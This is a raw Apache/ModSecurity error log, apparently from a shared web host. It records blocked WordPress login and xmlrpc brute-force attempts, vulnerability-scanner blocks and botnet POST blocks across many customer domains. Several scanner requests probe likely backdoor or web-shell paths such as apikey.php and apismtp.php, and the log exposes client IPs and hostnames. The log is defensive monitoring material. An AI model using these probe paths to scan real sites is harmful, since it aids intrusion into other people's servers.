[Tue May 26 17:23:54.912001 2026] [security2:error] [pid 882219:tid 882382] [client 109.181.69.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ0p8tTkZcqimiXcT19wAAAKY"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:55.267059 2026] [security2:error] [pid 882219:tid 882361] [client 109.181.69.187:58889] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ058tTkZcqimiXcT2BgAAkXU"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:55.725401 2026] [security2:error] [pid 882219:tid 882336] [remote 103.91.67.202:31728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWJ058tTkZcqimiXcT2GQAA6XQ"]
[Tue May 26 17:23:56.012844 2026] [security2:error] [pid 882219:tid 882379] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ058tTkZcqimiXcT2GgAAAKM"]
[Tue May 26 17:23:56.092222 2026] [security2:error] [pid 882219:tid 882397] [client 160.250.132.165:53979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jiyani.in"] [uri "/wp-login.php"] [unique_id "ahWJ1J8tTkZcqimiXcT2MgAAALU"]
[Tue May 26 17:23:56.467648 2026] [security2:error] [pid 882219:tid 882364] [client 208.91.198.85:34948] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWJ1J8tTkZcqimiXcT2QQAAAJQ"]
[Tue May 26 17:23:57.427314 2026] [security2:error] [pid 882219:tid 882347] [remote 109.181.69.187:58889] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ1Z8tTkZcqimiXcT2kQAAvX8"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:57.534593 2026] [security2:error] [pid 882219:tid 882293] [remote 57.141.2.57:55014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.karuppuswamykovil.in"] [uri "/temple-pk.php"] [unique_id "ahWJ1Z8tTkZcqimiXcT2pAAAw0k"]
[Tue May 26 17:23:57.705069 2026] [security2:error] [pid 882219:tid 882425] [client 95.181.237.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ1Z8tTkZcqimiXcT2nAAAANE"]
[Tue May 26 17:23:57.792999 2026] [security2:error] [pid 882219:tid 882412] [client 109.181.69.187:58889] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ1Z8tTkZcqimiXcT2pgAAxGE"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:58.111925 2026] [security2:error] [pid 882219:tid 882369] [client 160.250.132.165:55121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpanel.glorodavionics.com"] [uri "/wp-login.php"] [unique_id "ahWJ1p8tTkZcqimiXcT2wwAAAJk"]
[Tue May 26 17:23:58.186657 2026] [security2:error] [pid 882219:tid 882452] [client 109.181.69.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ1Z8tTkZcqimiXcT2tgAAAOw"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:58.431335 2026] [security2:error] [pid 882219:tid 882422] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ1p8tTkZcqimiXcT2vAAAAM4"]
[Tue May 26 17:23:58.780326 2026] [security2:error] [pid 882219:tid 882374] [client 20.206.67.134:5710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-plain.php"] [unique_id "ahWJ1p8tTkZcqimiXcT3GAAAAJ4"], referer: www.google.com
[Tue May 26 17:23:58.781230 2026] [security2:error] [pid 882219:tid 882450] [client 20.206.67.134:5746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWJ1p8tTkZcqimiXcT3GQAAAOo"], referer: www.google.com
[Tue May 26 17:23:58.939371 2026] [security2:error] [pid 882219:tid 882256] [remote 109.181.69.187:58889] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ1p8tTkZcqimiXcT3FQAA_CQ"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:59.282647 2026] [security2:error] [pid 882219:tid 882418] [client 109.181.69.187:58889] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ158tTkZcqimiXcT3JAAAyiM"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:59.352594 2026] [security2:error] [pid 882219:tid 882243] [remote 5.42.158.148:53570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWJ158tTkZcqimiXcT3JQAAthc"]
[Tue May 26 17:23:59.636066 2026] [security2:error] [pid 882219:tid 882376] [client 109.181.69.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ158tTkZcqimiXcT3MgAAAKA"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:59.693081 2026] [security2:error] [pid 882219:tid 882412] [client 20.206.67.134:5699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-plain.php"] [unique_id "ahWJ158tTkZcqimiXcT3NAAAAMQ"], referer: www.google.com
[Tue May 26 17:23:59.693313 2026] [security2:error] [pid 882219:tid 882388] [client 20.206.67.134:4947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWJ158tTkZcqimiXcT3MwAAAKw"], referer: www.google.com
[Tue May 26 17:23:59.766098 2026] [security2:error] [pid 882219:tid 882401] [client 20.206.67.134:5713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWJ158tTkZcqimiXcT3NQAAALk"]
[Tue May 26 17:23:59.994711 2026] [security2:error] [pid 882219:tid 882297] [remote 109.181.69.187:58889] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ158tTkZcqimiXcT3OQAAuk0"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:24:00.038204 2026] [security2:error] [pid 882219:tid 882454] [client 160.250.132.165:56213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "webdisk.aastha-enterprises.com"] [uri "/wp-login.php"] [unique_id "ahWJ2J8tTkZcqimiXcT3QwAAAO4"]
[Tue May 26 17:24:00.654768 2026] [security2:error] [pid 882219:tid 882476] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ2J8tTkZcqimiXcT3SAAAAQQ"]
[Tue May 26 17:24:00.892478 2026] [security2:error] [pid 882219:tid 882411] [client 20.206.67.134:5610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWJ2J8tTkZcqimiXcT3YAAAAMM"]
[Tue May 26 17:24:02.014641 2026] [security2:error] [pid 882219:tid 882350] [client 160.250.132.165:57374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcalendars.aastha-enterprises.com"] [uri "/wp-login.php"] [unique_id "ahWJ2p8tTkZcqimiXcT3rQAAAIY"]
[Tue May 26 17:24:02.459995 2026] [security2:error] [pid 882219:tid 882411] [client 223.235.98.214:16903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ2p8tTkZcqimiXcT3uwAAAMM"]
[Tue May 26 17:24:02.460151 2026] [security2:error] [pid 882219:tid 882411] [client 223.235.98.214:16903] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ2p8tTkZcqimiXcT3uwAAAMM"]
[Tue May 26 17:24:02.778095 2026] [security2:error] [pid 882219:tid 882421] [client 45.148.10.16:35384] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.quincaillerie.azurmediatec.com"] [uri "/"] [unique_id "ahWJ2p8tTkZcqimiXcT3zAAAAM0"]
[Tue May 26 17:24:02.983160 2026] [security2:error] [pid 882219:tid 882354] [client 195.178.110.48:42820] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "cpanel.grcorp.in"] [uri "/"] [unique_id "ahWJ2p8tTkZcqimiXcT30AAAAIo"]
[Tue May 26 17:24:02.983924 2026] [security2:error] [pid 882219:tid 882431] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ2p8tTkZcqimiXcT3vwAAANc"]
[Tue May 26 17:24:03.060461 2026] [security2:error] [pid 882219:tid 882402] [client 203.194.101.7:53981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ258tTkZcqimiXcT30wAAALo"]
[Tue May 26 17:24:03.060683 2026] [security2:error] [pid 882219:tid 882402] [client 203.194.101.7:53981] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ258tTkZcqimiXcT30wAAALo"]
[Tue May 26 17:24:03.759144 2026] [security2:error] [pid 882219:tid 882451] [client 160.250.132.165:58382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "web.redirefr.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ258tTkZcqimiXcT37wAAAOs"]
[Tue May 26 17:24:03.990100 2026] [security2:error] [pid 882219:tid 882422] [client 64.233.173.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWJ2J8tTkZcqimiXcT3VQAAzj8"]
[Tue May 26 17:24:04.347317 2026] [autoindex:error] [pid 882219:tid 882359] [client 198.235.24.161:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/service.google.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:24:04.829418 2026] [security2:error] [pid 882219:tid 882398] [client 20.206.67.134:9235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/tcqpzbhh.php"] [unique_id "ahWJ3J8tTkZcqimiXcT4DQAAALY"], referer: www.google.com
[Tue May 26 17:24:05.644212 2026] [security2:error] [pid 882219:tid 882400] [client 20.206.67.134:8249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWJ3Z8tTkZcqimiXcT4IwAAALg"]
[Tue May 26 17:24:05.815507 2026] [security2:error] [pid 882219:tid 882449] [client 160.250.132.165:59545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "webdisk.contabilidadecarioca.com.br"] [uri "/wp-login.php"] [unique_id "ahWJ3Z8tTkZcqimiXcT4JAAAAOk"]
[Tue May 26 17:24:06.018560 2026] [security2:error] [pid 882219:tid 882374] [client 20.206.67.134:8196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/fjfbainr.php"] [unique_id "ahWJ3p8tTkZcqimiXcT4KwAAAJ4"], referer: www.google.com
[Tue May 26 17:24:06.810771 2026] [security2:error] [pid 882219:tid 882472] [client 20.206.67.134:1826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWJ3p8tTkZcqimiXcT4RwAAAQA"]
[Tue May 26 17:24:07.063579 2026] [security2:error] [pid 882219:tid 882450] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ3p8tTkZcqimiXcT4QAAAAOo"]
[Tue May 26 17:24:07.229507 2026] [security2:error] [pid 882219:tid 882466] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ3p8tTkZcqimiXcT4SgAAAPo"]
[Tue May 26 17:24:07.529434 2026] [security2:error] [pid 882219:tid 882461] [client 160.250.132.165:60521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kalsampada.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ358tTkZcqimiXcT4WAAAAPU"]
[Tue May 26 17:24:09.287539 2026] [security2:error] [pid 882219:tid 882409] [client 160.250.132.165:61578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ4Z8tTkZcqimiXcT4hgAAAME"]
[Tue May 26 17:24:09.798528 2026] [security2:error] [pid 882219:tid 882254] [remote 54.38.29.86:37950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWJ4Z8tTkZcqimiXcT4kAAAjyI"]
[Tue May 26 17:24:09.983725 2026] [security2:error] [pid 882219:tid 882369] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ4Z8tTkZcqimiXcT4jAAAAJk"]
[Tue May 26 17:24:11.062514 2026] [security2:error] [pid 882219:tid 882476] [client 20.206.67.134:1801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWJ458tTkZcqimiXcT4swAAAQQ"]
[Tue May 26 17:24:11.105238 2026] [security2:error] [pid 882219:tid 882360] [client 160.250.132.165:62554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.mitwebsolutions.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ458tTkZcqimiXcT4tAAAAJA"]
[Tue May 26 17:24:11.136795 2026] [security2:error] [pid 882219:tid 882229] [remote 111.229.141.137:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWJ4p8tTkZcqimiXcT4sgAA1gk"]
[Tue May 26 17:24:11.713311 2026] [security2:error] [pid 882219:tid 882465] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ458tTkZcqimiXcT4ugAAAPk"]
[Tue May 26 17:24:12.100618 2026] [security2:error] [pid 882219:tid 882458] [client 20.206.67.134:1808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWJ5J8tTkZcqimiXcT40gAAAPI"]
[Tue May 26 17:24:12.884099 2026] [security2:error] [pid 882219:tid 882451] [client 160.250.132.165:63497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vacayqueen.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ5J8tTkZcqimiXcT45AAAAOs"]
[Tue May 26 17:24:13.086710 2026] [security2:error] [pid 882219:tid 882441] [client 223.235.98.214:6151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ5Z8tTkZcqimiXcT46wAAAOE"]
[Tue May 26 17:24:13.086858 2026] [security2:error] [pid 882219:tid 882441] [client 223.235.98.214:6151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ5Z8tTkZcqimiXcT46wAAAOE"]
[Tue May 26 17:24:13.459693 2026] [security2:error] [pid 882219:tid 882412] [client 203.194.101.7:54319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ5Z8tTkZcqimiXcT48gAAAMQ"]
[Tue May 26 17:24:13.459881 2026] [security2:error] [pid 882219:tid 882412] [client 203.194.101.7:54319] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ5Z8tTkZcqimiXcT48gAAAMQ"]
[Tue May 26 17:24:13.712417 2026] [security2:error] [pid 882219:tid 882259] [remote 195.250.23.247:46026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJ5Z8tTkZcqimiXcT4-gAA1yc"]
[Tue May 26 17:24:14.642817 2026] [security2:error] [pid 882219:tid 882388] [client 160.250.132.165:64551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tucanastitavegana.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ5p8tTkZcqimiXcT5HAAAAKw"]
[Tue May 26 17:24:14.767757 2026] [security2:error] [pid 882219:tid 882426] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ5p8tTkZcqimiXcT5EQAAANI"]
[Tue May 26 17:24:15.005720 2026] [security2:error] [pid 882219:tid 882364] [client 20.206.67.134:4613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWJ558tTkZcqimiXcT5JgAAAJQ"]
